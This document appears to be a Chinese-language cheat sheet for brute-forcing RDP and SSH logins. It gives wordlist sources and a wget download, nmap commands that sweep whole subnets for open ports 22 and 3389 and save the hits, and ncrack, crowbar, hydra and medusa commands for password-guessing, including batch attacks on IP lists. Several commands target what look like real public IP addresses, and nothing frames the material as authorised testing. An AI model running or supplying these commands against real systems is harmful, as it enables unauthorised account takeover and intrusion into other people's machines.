h扫描 nmap -sT -p22 192.168.1.1/24 -o ip22.txt
密码本
https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/worst-passwords-2017-top100-slashdata.txt 100个密码
https://github.com/danielmiessler/SecLists/raw/master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt 100万密码
kali自带50M的rockyou.txt字典
wget https://github.com/mishrasunny174/WordLists/raw/master/rockyou.tar.gz

工具集合
Wordlist based bruteforce
一，apt-get install ncrack
NCRACK
ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist> :3389

ncrack -vv --user user -P wordlist.txt 192.168.0.32:3389

二，apt-get install crowbar
或# git clone https://github.com/galkan/crowbar

cd crowbar/

pip3 install -r requirements.txt

./crowbar.py --server 116.90.87.230/32 -b rdp -u administrator -C #针对指定ip /usr/share/nmap/nselib/data/passwords.lst
这里注意rockyou.txt不支持utf-8格式字典只支持.lst字典
Crowbar
crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s /32 -v
./crowbar.py -b rdp -u user -C password_wordlist -S iplist3389.txt -v
对整个iplist3389列表进行暴力破解，注意ip格式ip/32
crowbar -b rdp -u user -C password_wordlist -s 192.168.0.16/24 -v
上面针对一个网段
./crowbar.py --server 116.90.87.241/32 -b rdp -u administrator -C /usr/share/nmap/nselib/data/passwords.lst
推荐
三，hydra apt-get install hydra

hydra 123.57.173.87 rdp -L users.txt -P pass.txt -V
批量爆破命令
hydra -M target.txt rdp -L userlist.txt -P passwordlist.txt -V

nmap -sT -p 3389 --open 192.90.81.0/24 -oG - | awk '$4=="Ports:"{print $2}' > ip3389_82.txt
把所有80端口开发的服务器ip保存到output.txt
使用shell脚本进行C段ip批量 注意格式dos2unix
再次代码nmap -sT -p 3389 -open 192.90.81.0/24 -oG - | awk '$4=="Ports:"{print $2}' >> ip3389_83.txt
采用>>追加方式写入ip3389_83.txt
批量保存save.log
hydra -L users.txt -P password.txt -t 1 -vV -e ns -o save.log 192.168.1.104 ssh

hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 -vV -e ns -o save.log 178.62.118.98 rdp
四，medusa
medusa -M ssh -h 192.168.157.131 -u root -P passwd.txt